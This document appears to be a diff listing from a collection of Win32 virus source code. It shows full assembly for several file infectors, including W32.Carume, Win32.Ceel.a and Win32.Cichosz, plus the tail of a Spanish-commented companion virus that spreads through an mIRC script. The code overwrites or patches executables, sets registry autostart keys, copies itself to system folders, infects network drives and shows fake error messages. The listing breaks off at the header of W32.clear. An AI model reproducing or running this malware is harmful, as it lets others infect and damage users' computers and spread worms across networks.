lea esi, [cFileName] ;pone en Esi el nombre del file
lea edi, [newfilename] ;pone en edi un buffer para guardar el nombre del nuevo file
stowit:
lodsb ;mueve un byte de esi a Al
cmp al, '.' ;lo compara con el punto
je addext ; si ya encontramos el punto vamos a la rutina addext
stosb ;mueve el byte an al a Edi
jmp stowit ;hace un loop hasta encontrar el punto
addext:
stosb ;mueve el "." a Edi
lea esi, [newext] ;pone en esi la extension vxe
movsw ;mueve el contenido de Esi (vxe) a Edi
movsw ;mueve el contenido de Esi (vxe) a Edi
push 0 ;Flags
push offset newfilename ;nombre con la extension .Vxe
push offset cFileName ;nombre con la extension .Exe
call MoveFileA ;convierte el .exe a . vxe
push 0 ;Flag
push offset cFileName ;nombre del .exe
push offset handle2 ;nombre del virus que se esta ejecutando
call CopyFileA ;con esta funcion copiamos este virus con el antiguo nombre del .exe
push 2 ;Write_Mode
push offset cFileName ;abrimos el .exe "infectado"
call _lopen ;Oopen file
mov dword ptr [_handle],eax ;guarda el handle del archivo abierto
push dword 0 ;how to move ; desde el file begin
push NULL
push _off_ ;offset a donde mover el puntero del file
push eax ;handle del file
call SetFilePointer ;movemos el puntero a la posicion donde se escribira el nombre del
;.vxe
mov eax, dword ptr [_handle] ;mueve el handle a Eax
push 50 ;numero de byes a escribir
push offset newfilename ;bytes que vamos a escribir
push eax ;handle del file a escribir
call _lwrite ;de esta forma si por ejemplo infectamos write.exe , en el nuevo write.exe
;se guardara el nombre write.vxe para luego ejecutarlo
push eax ;handle del archivo
call _lclose ;close the file
nextfile:
push offset filedta ;estructura donde guardar la informacion de los archivos encontrados
mov eax, dword ptr [handle_] ;handle de la primera busqueda
push eax
call FindNextFileA ;buscamos el sigueiente exe
cmp eax, 0 ;si no hay mas files
je done_this :saltamos a done_this
jmp check
done_this:
push 25 ;tamaño del buffer
push offset path1 ;buffer donde guardar
call GetSystemDirectoryA ; el directorio system ("C:\Windows\System\")
push offset handle3 ;cadena que contiene "\FlyingButterflies.scr"
push offset path1 ;path de system
call lstrcat ;juntamos las dos cadenas
push 0 ;flag
push offset path1 ;nombre que se obtuvo en la funcion anterior
push offset handle2 ;nombre de este file ("e.g:Virus.Exe")
call CopyFileA ;movemos el virus al dir. system para mandarlo con Mirc
push 2 ;flag
push offset MircLNK ;nombre del acceso directo de mirc
call _lopen :lo abrimos
mov dword ptr [_handle],eax ;handle de mirc.lnk en Eax
push dword 2
push NULL
push -50
push eax
call SetFilePointer ;nos movemos al offset -50 para ver el path de mirc
mov eax, dword ptr [_handle]
push 50
push offset MircDir
push eax
call _lread ;leemos 50 bytes en donde debe estar el path de mirc
push eax
call _lclose ;cerramos el acceso directo
std
lea esi, MircIni ;ponemos en Esi el path de mirc
get_next_byte:
lodsb ;movemos un byte de esi a al
cmp al, ':' ;vemos si ya encontramos los dos puntos
jne get_next_byte ;loop
push offset MircIni ; = \script.ini
push esi ;path del mirc
call lstrcat ;juntamos los dos
push 0 ;flag
push esi ;nombre del archivo script.ini
call _lcreate ;creamos o sobreescribimos el file
push _scrpt_ ;numero de bytes a escribir
push offset IniData1 ;contenido del script.ini
push eax ;handle del archivo creado
call _lwrite ;escribimos el archivo
push eax ;handle
call _lclose ;cerramos el archivo
push offset path3 ;Path original
call SetCurrentDirectoryA ;restauramos el path del principio
push 0
call ExitProcess ; y terminamos
;=============================
.data
handle1 db 50 dup(0)
handle2 db 50 dup(0)
maska db '*.exe',0
newext db 'vxe',0
handle_ dd 0
_handle dd 0
filedta:
FileAttributes dd 0
CreationTime db 8 dup(0)
LastAccessTime db 8 dup(0)
LastWriteTime db 8 dup(0)
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 50 dup('N')
cAltFileName db 14 dup(0)
newfilename db 50 dup(0)
path2 db 25 dup(0)
path3 db 260 dup(0)
MircLNK db 'Start Menu\Programs\mIRC\mIRC32.LNK',0
MircDir db 50 dup(0)
MircIni db '\script.ini',0
Mirc_ db 'c:\mirc\script.ini',0
IniData1:
db '[Script]',0dh,0ah
db 'n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }',0dh,0ah
db 'n1= /dcc send $nick '
path1 db 25 dup(0)
handle3 db '\FlyingButterflies.scr',0,'}'
db 100 dup(0)
end_script:
end begin
Win32/Infector/Win32.CJD.asm
+12102
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Cabanas.2999.asm
+2642
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Carberp.7z
BIN
View File
Binary file not shown.
Win32/Infector/Win32.Carume.asm
+381
View File
@@ -0,0 +1,381 @@
;
; W32.Carume
;
; Written by RadiatioN @ XERO VX and hacking group in February-March 2006
;
; THIS FILE HAS NO COPYRIGHTS! I AM NOT RESPONSIBLE FOR ANY DAMAGE WITH THAT CODE!
;
; Compile with masm 8.2
;
; greetings to vBx and SkyOut
;
; What does this Code?
; - Copy itself to %WINDIR%\Help\WinHelpCenter.exe
; - Adds a new registry entry for autostarting itself
; - Searches in
; %WINDIR%\ServicePackFiles\i386\
; %WINDIR%\
; %WINDIR%\system32\
; %WINDIR%\system32\dllcache\
; for file extension files like
; .exe
; .dll
; .scr
; to infect it
; - infecting file by changing the RVA entry point of the file
;
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include advapi32.inc
includelib user32.lib
includelib kernel32.lib
includelib advapi32.lib
.data
; Directories to infect
szDirectory db "\ServicePackFiles\i386\", 0, "\", 0, "\system32\", 0, "\system32\dllcache\", 0
dwDirPos dword 0
dwDirCount dword 0
;virus name
szVirName db "W32.Carume",0
; file extensions to find
szFileExtension db ".exe", 0, ".dll", 0, ".scr", 0
dwFileExPos dword 0
dwFileExCount dword 0
; Rest of variables
szWinDir db 260 dup(0)
szDirDest db 260 dup(0)
szWildcard db '*',0
szNewDir db "\Help\WinHelpCenter.exe",0
szKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
szValueName db "WinHelpCenter",0
hSearch dword 0
dwRetVal dword 0
check dword 0
dwDamnStuff dword 0
dwStartOfPE dword 0
dwEntryPoint dword 0
dwCount dword 0
hKey dword 0
; WIN32_FIND_DATA structure
dwFileAttributes dword 0
;FILETIME structure
ftCreationTime dword 0
ftCreationTime2 dword 0
;FILETIME structure
ftLastAccessTime dword 0
ftLastAccessTime2 dword 0
;FILETIME structure
ftLastWriteTime dword 0
ftLastWriteTime2 dword 0
nFileSizeHigh dword 0
nFileSizeLow dword 0
dwReserved0 dword 0
dwReserved1 dword 0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
.code
start:
;Copy File to %WINDIR%\Help\WinHelpCenter.exe
invoke GetWindowsDirectory, offset szWinDir, 260
push offset szDirDest
push offset szNewDir
push offset szWinDir
call StrCatDest
invoke GetCommandLine
push eax
call RemoveFirstLast
invoke CopyFile, eax, offset szDirDest, TRUE
invoke RegCreateKey, HKEY_LOCAL_MACHINE, offset szKey, offset hKey
invoke lstrlen, offset szDirDest
invoke RegSetValueEx, hKey, offset szValueName, 0, REG_SZ, offset szDirDest, eax
NextDir:
;go through directorys and infect the files
push offset dwDirPos
push offset szDirectory
call GetNextString
inc dwDirCount
mov esi, eax
push offset szDirDest
push esi
push offset szWinDir
call StrCatDest
push offset szDirDest
push offset szWildcard
push offset szDirDest
call StrCatDest
invoke FindFirstFile, offset szDirDest, offset dwFileAttributes
mov hSearch, eax
nextfile:
push offset dwFileExPos
push offset szFileExtension
call GetNextString
inc dwFileExCount
push eax
push offset cFileName
call InStr2
cmp eax, 1
je Infect
cmp dwFileExCount, 3
jne nextfile
jmp NoInfection
Infect:
push offset szDirDest
push esi
push offset szWinDir
call StrCatDest
push offset cFileName
push offset szDirDest
call StrCat
;File infection methods
;GENERIC_READ | GENERIC_WRITE
mov eax, 0C0000000h
;open file
invoke CreateFile, addr szDirDest, eax, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov dwRetVal, eax
;read start of PE header and add value for entry point offset
invoke SetFilePointer, dwRetVal, 03Ch, NULL, FILE_BEGIN
invoke ReadFile, dwRetVal, offset dwStartOfPE, 4, offset dwDamnStuff, NULL
add dwStartOfPE, 028h
;read entry point and a value
invoke SetFilePointer, dwRetVal, dwStartOfPE, NULL, FILE_BEGIN
invoke ReadFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
add dwEntryPoint, 210h
;write new entry point
invoke SetFilePointer, dwRetVal, -4, NULL, FILE_CURRENT
invoke WriteFile, dwRetVal, offset dwEntryPoint, 4, offset dwDamnStuff, NULL
invoke CloseHandle, dwRetVal
NoInfection:
mov dwFileExPos, 0
mov dwFileExCount, 0
invoke FindNextFile, hSearch, offset dwFileAttributes
cmp eax, 0
jnz nextfile
cmp dwDirCount, 4
jne NextDir
invoke ExitProcess, 0
;nearly equal to the C-function InStr()
InStr2:
pop ebp
pop ecx
pop check
mov edx, check
InStrLoop:
mov al, [ecx]
mov bl, [edx]
cmp al, bl
jne InStrRestore
inc edx
mov bl, [edx]
cmp bl, 0
je InStrTrue
jmp InStrResume
InStrRestore:
mov edx, check
InStrResume:
cmp al,0
je InStrFalse
cmp bl,0
je InStrFalse
inc ecx
jmp InStrLoop
InStrFalse:
mov eax, 0
push ebp
ret
InStrTrue:
mov eax, 1
push ebp
ret
;nearly equal to the c-function StrCat()
StrCat:
pop ebp
pop ecx
pop edx
StrCatLoop:
mov al, [ecx]
inc ecx
cmp al, 0
jne StrCatLoop
dec ecx
StrCatLoop2:
mov bl, [edx]
mov [ecx], bl
inc ecx
inc edx
cmp bl,0
jne StrCatLoop2
push ebp
ret
;modified function of StrCat copys destination string in the 3. argument
StrCatDest:
pop ebp
pop ebx
pop ecx
pop edx
StrCatDestLoop:
mov al, [ebx]
mov [edx], al
inc ebx
inc edx
cmp al, 0
jne StrCatDestLoop
dec ebx
dec edx
StrCatDestLoop2:
mov bl, [ecx]
mov [edx], bl
inc ecx
inc edx
cmp bl,0
jne StrCatDestLoop2
push ebp
ret
;equal to the c-function strcpy()
StrCpy:
pop ebp
pop ebx
pop ecx
StrCpyLoop:
mov al, [ebx]
mov [ecx], al
inc ecx
inc ebx
cmp al, 0
jne StrCpyLoop
push ebp
ret
;gets the next string in an array
GetNextString:
pop ebp
pop ebx
pop ecx
add ebx, [ecx]
mov al, [ecx]
cmp al, 0
jnz GetNextStringLoop
inc BYTE PTR [ecx]
mov eax, ebx
push ebp
ret
GetNextStringLoop:
mov al, [ebx]
inc ebx
inc BYTE PTR [ecx]
cmp al, 0
jnz GetNextStringLoop
push ebp
mov eax, ebx
ret
;removes the first and the last character of a string
RemoveFirstLast:
pop ebp
pop ebx
inc ebx
RemoveFirstLastLoop:
mov dl, [ebx]
dec ebx
mov [ebx], dl
inc ebx
inc ebx
cmp dl,0
jnz RemoveFirstLastLoop
dec ebx
dec ebx
dec ebx
dec ebx
xor dl, dl
mov [ebx], dl
push ebp
ret
end start
Win32/Infector/Win32.Ceel.a.asm
+624
View File
@@ -0,0 +1,624 @@
;---------------------
;This is the Simple PE infection
;
;Name: lee ling chuan
;NickName:lclee_vx
;Company : Scan Associates
;Website : http://www.scan-associates.net
;Forum : http://www.prisma-mampu.gov.my/listforum.do
;the code just for research purpose
;------------------
.386p
.model flat, stdcall
option casemap:none
jumps
extrn MessageBoxA:proc
extrn ExitProcess:proc
sz_unuse equ (offset virii - offset virii_start)
MyVirusSz equ (offset virii_end - offset virii_sz)
heap_sz equ (offset heap_end - offset heap_start)
total_sz equ (MyVirusSz+heap_sz)
.data
szMessage db "this is Ring3 Virus, Just For Research Purpose", 0
szTitle db "from lclee_vx, http://www.scan-associates.net", 0
FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS
.code
virii_sz label byte
virii_start:
call virii
pushad
pushfd
virii:
pop ebp
mov eax, ebp
sub ebp, offset virii
sub eax, sz_unuse
sub eax, 00001000h
now_eip equ $-4
mov dword ptr [ebp+appbase],eax
mov esi, [esp+24]
xor edx, edx
call k32base
mov dword ptr [ebp+kernel], eax
lea edi, [ebp + @@offset_api]
lea esi, [esi + @@name_api]
call get_apis
call prepare_location
call start_infect
xchg ebp, ecx
jecxz SetSEH
popfd
popad
mov eax, 12345678h
org $-4
old_eip dd 00001000h
add eax, 12345678h
org $-4
appbase dd 00400000h
jmp eax
;---------------------------------
;this portion is to get the kernel32.dll address
;------------------------
k32base proc
dec esi
cmp word ptr [esi], "ZM"
jne k32base
mov edx, [esi+03ch]
cmp dword ptr [edx], "EP"
jne k32base
cmp esi, [esi+edx+34h]
jnz k32base
xchg eax, esi
ret
k32base endp
;@exit:
;ret
;------------------------------
;this portion is to get the api we want to run, :) ....excited?
;--------------------------
get_apis proc
@@step_1:
push esi
push edi
call get_api
pop edi
pop esi
xor al, al
stosd
xchg edi, esi
@@step_2:
scasb
jnz @@step_2
xchg edi, esi
@@step_3:
cmp byte ptr [esi], 0AAh
jnz @@step_1
ret
get_apis endp
get_api proc
mov edx, esi
mov edi, esi
xor al, al
@step_1: scasb
jnz @step_1
sub edi, esi
mov ecx, edi
xor eax, eax
mov esi, 3ch
add esi, [ebp+kernel]
lodsd
add eax, [ebp+kernel]
mov esi, [eax+78h]
add esi, 1ch
add esi, [ebp+kernel]
lea edi, [ebp+Address_of_func]
lodsd
add eax, [ebp+kernel]
stosd
lodsd
add eax, [ebp+kernel]
push eax
stosd
lodsd
add eax, [ebp+kernel]
stosd
pop esi
xor ebx, ebx
@step_2:
lodsd
push esi
add eax, [ebp+kernel]
mov esi, eax
mov edi, edx
push ecx
cld
rep cmpsb
pop ecx
jz @step_3
pop esi
inc ebx
jmp @step_2
@step_3: pop esi
xchg eax, ebx
shl eax, 1
add eax, dword ptr [ebp+Address_of_ordinals]
xor esi, esi
mov esi, eax
lodsd
shl eax, 2
add eax, dword ptr [ebp+Address_of_func]
mov esi, eax
lodsd
add eax, [ebp+kernel]
ret
get_api endp
;----------------
;prepare the location to scan
;--------------------
prepare_location proc
lea edi, [ebp+WinDir]
push 7Fh
push edi
call [ebp+_GetWindowsDirectoryA]
lea edi, [ebp+SysDir]
push 7Fh
push edi
call [ebp+_GetSystemDirectoryA]
lea edi, [ebp+CurrentDir]
push edi
push 7Fh
call [ebp+_GetCurrentDirectoryA]
ret
prepare_location endp
;-----------------
;let start to scan and looking for our needed file, heheheheheh :)
;---------------
start_infect:
lea edi, [ebp+location]
mov byte ptr [ebp+Mirror], 04h
set_location:
push edi
call [ebp+_SetCurrentDirectoryA]
push edi
call go_infect
pop edi
add edi, 7Fh
dec byte ptr [ebp+Mirror]
jnz set_location
ret
go_infect proc
and dword ptr [ebp+counter], 00000000h
; lea eax, [ebp+offset find_data]
lea eax, [ebp+offset WIN32_FIND_DATA]
push eax
lea eax, [ebp+offset Mark]
push eax
call [ebp+_FindFirstFileA]
inc eax
jz Fail
dec eax
mov dword ptr [ebp+SearchHandle], eax
@go_infect1: push dword ptr [ebp+old_eip]
push dword ptr [ebp+appbase]
call infect
pop dword ptr [ebp+appbase]
pop dword ptr [ebp+old_eip]
inc byte ptr [ebp+counter]
cmp dword ptr [ebp+counter], 0FFFFFFFFh
jz Fail
@go_infect2: lea edi, [ebp+WFD_szFileName]
mov ecx, max_path
xor al, al
rep stosb
; lea eax, [ebp+offset find_data]
lea eax, [ebp+offset WIN32_FIND_DATA]
push eax
push dword ptr [ebp+SearchHandle]
call [ebp+_FindNextFileA]
test eax, eax
jnz @go_infect1
endp go_infect
ClsSeachHandle:
push dword ptr [ebp+SearchHandle]
call [ebp+_FindClose]
Fail:
ret
;-------------------
;start infect. i use the "increase the last section" technic
;------------------
infect:
lea esi, [ebp+WFD_szFileName]
push 80h
push esi
call [ebp+_SetFileAttributesA]
call open_exe
inc eax
jz fail_open
dec eax
mov dword ptr [ebp+FileHandle], eax
call file_mapping
test eax, eax
jz file_close
mov dword ptr [ebp+MapHandle], eax
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
call map_view
test eax, eax
jz unmap_view
mov eax, dword ptr [ebp+MapAddress]
mov esi, [eax+3ch]
add esi, eax
cmp dword ptr [esi], "EP"
jz cant_infect
cmp dword ptr [esi+4ch], "LEE"
jz cant_infect
push dword ptr [esi+3ch]
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call [ebp+_CloseHandle]
pop ecx
mov eax, dword ptr [ebp+WFD_nFileSizeLow]
add eax, MyVirusSz
add eax, 1000h
call ReAlign
xchg ecx, eax
call file_mapping
test eax, eax
jz file_close
mov dword ptr [ebp+MapHandle], eax
mov ecx, dword ptr [ebp+NewFileSize]
call map_view
test eax, eax
jz unmap_view
mov dword ptr [ebp+MapAddress], eax
mov esi, [eax+3ch]
add esi, eax
mov edi, esi
mov ebx, [esi+74h]
shl ebx, 3
sub eax, eax
mov ax, word ptr [esi+6h]
dec eax
mov ecx, 28h
mul ecx
add esi, 78h
add esi, ebx
add esi, eax
mov eax, [edi+28h]
mov dword ptr [ebp+old_eip], eax
mov eax, [edi+34h]
mov dword ptr [ebp+appbase], eax
mov edx, [esi+10h]
mov ebx, edx
add edx, [esi+14h]
push edx
mov eax, ebx
add eax, [esi+0ch]
mov [edi+28h], eax
mov dword ptr [ebp+now_eip], eax
mov eax, [esi+10h]
add eax, MyVirusSz
mov ecx, [edi+3ch]
call ReAlign
mov [esi+10h], eax
mov [esi+08h], eax
pop edx
mov eax, [esi+10h]
add eax, [esi+0ch]
mov [edi+50h], eax
or dword ptr [esi+24h], 00000020h
or dword ptr [esi+24h], 20000000h
or dword ptr [esi+24h], 80000000h
mov dword ptr [edi+4ch], "LEE"
lea esi, [ebp+virii_start]
xchg edi, edx
add edi, dword ptr [ebp+MapAddress]
mov ecx, MyVirusSz
rep movsb
jmp unmap_view
;-----------------
;this portion we open the file
;----------------
open_exe proc
sub eax, eax
push eax
push eax
push 00000003h
push eax
push 00000001h
push 80000000h or 40000000h
push esi
call [ebp+_CreateFileA]
ret
open_exe endp
;-----------------------
;this portion fail to open the file, we are going to set the old file attribute
;-----------------------
fail_open proc
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp+WFD_szFileName]
push eax
call [ebp+_SetFileAttributesA]
ret
fail_open endp
;-----------------------
;map the file into memory
;----------------------
file_mapping proc
sub eax, eax
push eax
lea ecx, dword ptr [ebp+WFD_nFileSizeLow]
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
ret
file_mapping endp
;-----------------------
;so bad, we fail to map the file
;---------------------
file_close:
push dword ptr [ebp+FileHandle]
call [ebp+_CloseHandle]
;-----------------------
;this portion start function MapViewOfFile
;----------------------
map_view proc
push ecx
push 00000000h
push 00000000h
push 00000002h
push dword ptr [ebp+MapHandle]
call [ebp+_MapViewOfFile]
ret
map_view endp
;-----------------
;this portion for error of MapViewOfFile
;------------------------
unmap_view:
push dword ptr [ebp+MapAddress]
call [ebp+_UnmapViewOfFile]
;--------------------------
;this file cannot infect and will crash the system, we need to restore back all the variable
;--------------------------
cant_infect:
dec byte ptr [ebp+counter]
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
call original
;--------------------
;this portion is to reassembly the original file when detected failed infection
;----------------
original proc
push 00000000h
push 00000000h
push ecx
push dword ptr [ebp+FileHandle]
call [ebp+_SetFilePointer]
push dword ptr [ebp+FileHandle]
call [ebp+_SetEndOfFile]
ret
original endp
;----------------------
;align the infected PE file
;eax=file size, ecx=file alignment
;---------------
ReAlign proc
push edx
sub edx, edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
ret
ReAlign endp
;----------------
;all the variable
;-----------------
;appbase dd 00400000h
kernel dd ?
Mark db "*.EXE", 0
counter dd 00000000h
@@name_api label byte
@FindFisrtFileA db "FindFirstFileA", 0
@FindNextFileA db "FindNextFileA", 0
@FindClose db "FindClose", 0
@SetFileAttributesA db "SetFileAttributesA", 0
@CreateFileA db "CreateFileA", 0
@CreateFileMappingA db "CreateFileMappingA", 0
@CloseHandle db "CloseHandle", 0
@MapViewOfFile db "MapViewOfFile", 0
@SetFilePointer db "SetFilePointer", 0
@GetWindowsDirectoryA db "GetWindowsDirectoryA", 0
@GetSystemDirectoryA db "GetSystemDirectoryA", 0
@GetCurrentDirectoryA db "GetCurrentDirectoryA", 0
@SetCurrentDirectoryA db "SetCurrentDirectoryA", 0
@UnmapViewOfFile db "UnmapViewOfFile", 0
@SetEndOfFile db "SetEndOfFile", 0
db 0AAh
virii_end label byte
heap_start label byte
max_path equ 260
SearchHandle dd 00000000h
Address_of_func dd 00000000h
Address_of_ordinals dd 00000000h
FileHandle dd 00000000h
MapHandle dd 00000000h
MapAddress dd 00000000h
NewFileSize dd 00000000h
location label byte
WinDir db 7Fh dup (00)
SysDir db 7Fh dup (00)
CurrentDir db 7Fh dup (00)
Level db (($-location)/7Fh)
Mirror equ Level
@@offset_api label byte
_FindFirstFileA dd 00000000h
_FindNextFileA dd 00000000h
_FindClose dd 00000000h
_SetFileAttributesA dd 00000000h
_CreateFileA dd 00000000h
_CreateFileMappingA dd 00000000h
_CloseHandle dd 00000000h
_MapViewOfFile dd 00000000h
_SetFilePointer dd 00000000h
_GetWindowsDirectoryA dd 00000000h
_GetSystemDirectoryA dd 00000000h
_GetCurrentDirectoryA dd 00000000h
_SetCurrentDirectoryA dd 00000000h
_UnmapViewOfFile dd 00000000h
_SetEndOfFile dd 00000000h
WIN32_FIND_DATA label byte
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
WFD_szFileName DB max_path DUP (?)
WFD_szAlternateFileName DB 13 DUP (?)
DB 3 DUP (?) ; dword padding
SIZEOF_WIN32_FIND_DATA EQU SIZE WIN32_FIND_DATA
heap_end label byte
;-------------
;popup the meessage
;----------------
SetSEH:
pop dword ptr fs:[0]
add esp, 4
popad
popfd
sub eax, eax
push eax
push offset szTitle
push offset szMessage
push eax
call MessageBoxA
sub eax, eax
push eax
call ExitProcess
end virii_start
;--------------------------
;Thanks, r00t, hackerboy, billy...ur tutorial wonderful.... :)
;--------------------
Win32/Infector/Win32.Chthon.asm
+1810
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.Cichosz.asm
+328
View File
@@ -0,0 +1,328 @@
;============================================================
;=== Win32.Cichosz virus. Coded by Necronomikon[ShadowvX] ===
;============================================================
;Virusname: Win32.Cichosz
;Author: Necronomikon
;Date:26-12-00
;Features: - Worming: It checks all drives and if it have access to
;a network drive,it infect there some files. (thanks to SnakeByte)
; - Fuck Debuggers
; - Display MessageBox
; - Renames infected files to svx
;---------------------------------------
;--- based on Win32.3x3 by BumbleBee ---
;---------------------------------------
;======================================================
; . To compile:
;
; tasm32 /ml /m3 cichosz,,;
; tlink32 -Tpe -c cichosz,cichosz,, import32.lib
;=======================================================
.386
locals
jumps
.model flat,STDCALL
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCommandLineA:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn WinExec:PROC
extrn MessageBoxA:PROC
extrn GetSystemTime:PROC
extrn CloseHandle:PROC
extrn GetFileSize:PROC
extrn GetCurrentDirectoryA:PROC
extrn SetCurrentDirectoryA:PROC
extrn DeleteFileA:PROC
L equ <LARGE>
.DATA
szTitle db "Structured Exception Handler example",0
szMessage db "Intercepted General Protection Fault!",0
.code
start:
call setupSEH ; The call pushes the offset
; past it in the stack rigth?
; So we will use that :)
exceptionhandler:
mov esp,[esp+8] ; Error gives us old ESP
; in [ESP+8]
push 00000000h ; Parameters for MessageBoxA
push offset szTitle
push offset szMessage
push 00000000h
call MessageBoxA
push 00000000h
call ExitProcess ; Exit Application
setupSEH:
push dword ptr fs:[0] ; Push original SEH handler
mov fs:[0],esp ; And put the new one (located
; after the first call)
mov ebx,0BFF70000h ; Try to write in kernel (will
mov eax,012345678h ; generate an exception)
xchg eax,[ebx]
end start
windoze db 'C:\Windows\System\Sys\Porn.exe',0
fHnd dd ? ; handle for files
shit dd 0 ; for write process
cont0 dd 0 ; for loops
cont1 db 0 ; for loops
findData db 316 dup(0) ; data for ffirst and fnext
fMask db '*.EXE' ; mask for finding exe files
ffHnd dd ? ; handle for ffirst and fnext
hostName db 260 dup(0) ; space for save host name
hwoArgs db 260 dup(0) ; host without arguments
futureHostName db 260 dup(0) ; space for save new host name
chDir db 260 dup(0) ; space for save current dir
commandLine dd ? ; handle for command line
sysTimeStruct db 16 dup(0) ; space for system time struct
; virus id and author
virusId db 'Win32.CICHOSZ coded by Necronomikon',0
; message
mess db 'This is my 1st Win32-Virus.'
db 0dh,0ah,'Greetingz tha whole ShadowvX Group!',0
bmess db 'Invalid call in shared memory 0x0cf689000.',0
;--------------------
push offset Buffer ; offset of the buffer
push 60h ; buffer-lenght
call GetLogicalDriveStrings
cmp eax, 0 ; did we fail ?
je StopThis
lea esi, Buffer
WhatDrive:
push esi
call GetDriveType
cmp eax, DRIVE_REMOTE ; we got a network drive
jne NoNetwork
; esi still contains the offset of
; the root dir on the drive
call infectDrive ; so we infect it.. ;P
NoNetwork:
Call GetNextZero ; place esi after the next zero
; ( searching from esi onwards )
cmp byte ptr [esi],0
jne WhatDrive ; if we searched all drives we
; end here, otherwise we check the type
StopThis:
ret
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
; Drives so this buffersize should be
; big enough ;)
;----------------------------------------
virus:
lea eax,sysTimeStruct ; check for payload
push eax
call GetSystemTime ; get system time
lea eax,sysTimeStruct
cmp word ptr [eax+2],12
jne skipPay
cmp word ptr [eax+6],14
jne skipPay
push L 1030h ; show a message box
lea eax,virusId
push eax
lea eax,mess
push eax
push L 0
call MessageBoxA
skipPay:
call GetCommandLineA ; get command line
mov dword ptr [commandLine],eax
xor esi,esi ; copy it to get host path
lea edi,hostName ; needed for infection process
copyLoop:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,0
je skipArgs
inc esi
jmp copyLoop
skipArgs: ; copy host name without args
xor esi,esi
lea edi,hwoArgs
lea eax,hostName
copyLoopb:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,'.'
je ffirst
inc esi
jmp copyLoopb
ffirst:
mov dword ptr [edi+esi],'EXE.' ; add extension
; now we have arguments in
; hostName and name only in
; hwoArgs
push 0
lea eax,windoze
push eax
lea eax,hwoArgs
push eax
call CopyFileA ; install in windows dir
lea eax,chDir
push eax ; get current directory
push 260
call GetCurrentDirectoryA
cmp eax,0
retDir:
lea eax,chDir
push eax ; restore work directory
call SetCurrentDirectoryA
fnext:
call infectFile
skipThis:
lea eax,findData
push eax
push dword ptr [ffHnd]
call FindNextFileA ; find next *.EXE
cmp eax,0
jne fnext
push dword ptr [ffHnd]
call FindClose ; close ffist/fnext handle
execHost:
xor esi,esi ; copy hostName to future host Name
lea edi,futureHostName
lea eax,hostName
copyLoop2:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,'.'
je contExec
inc esi
jmp copyLoop2
contExec:
mov dword ptr [edi+esi],'svx.' ; change ext to svx
push 1
push edi
call WinExec ; exec host
cmp eax,32 ; exec error?
jb lastOptionStealth ; je stealth with lame message
goOut:
push L 0h
call ExitProcess ; exit program
infectFile:
xor esi,esi ; copy file found name to
lea edi,futureHostName ; future host name
lea eax,findData
add eax,44
icopyLoop:
mov bl,byte ptr [eax+esi]
mov byte ptr [edi+esi],bl
cmp bl,'.'
je continueInf
inc esi
jmp icopyLoop
continueInf:
mov dword ptr [edi+esi],'svx.' ; change ext to svx
push eax
push edi
push eax
call MoveFileA ; rename the host to *.svx
pop eax
push 0
push eax
lea eax,hwoArgs
push eax
call CopyFileA ; copy current host to new host
; (virus body)
ret
lastOptionStealth: ; lame mess when we can't exec host
push L 1010h ; user can think the program is
push L 0h ; corrupted or windows goes
lea eax,bmess ; wrong (very common =] )
push eax
push L 0
call MessageBoxA
jmp goOut
dcLoop:
push L 0
lea eax,shit
push eax
push L 1
push edi
push dword ptr [fHnd]
cmp byte ptr [edi],0ffh
jne skipFF
dec dword ptr [cont0]
call addFF
inc edi
skipFF:
inc edi
dec dword ptr [cont0]
cmp dword ptr [cont0],0
jne dcLoop
push dword ptr [fHnd] ; close file
call CloseHandle
addFF:
xor ecx,ecx
mov cl,byte ptr [edi+1]
mov byte ptr [cont1],cl
cmp cl,0
jne addFFLoop
ret
addFFLoop:
push L 0
lea eax,shit
push eax
push L 1
push edi
push dword ptr [fHnd]
dec byte ptr [cont1]
cmp byte ptr [cont1],0
jne addFFLoop
ret
Ends
End virus
Win32/Infector/Win32.Clear.asm
+443
View File
@@ -0,0 +1,443 @@
; [ W32.clear by drcmda ]
; -_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
; SIMPLE BUT CLEAR WIN32 PE INFECTOR, USES SIMPLE XOR ENCRYPTION,
; MUTEXES AND DIRECTORY TRAVERSEL (ON EVERY FIXED DRIVE)... I FOR
; MYSELF DON'T LIKE VIRII BUT SINCE I DISCOVERED THE PE-HEADER I
; JUST WANTED TO WRITE ONE :) I TRIED TO UNDERSTAND 100% OF THE
; TECHNIQUES USED FOR THIS PURPOSE SO I WROTE EVERY ROUTINE IN THIS
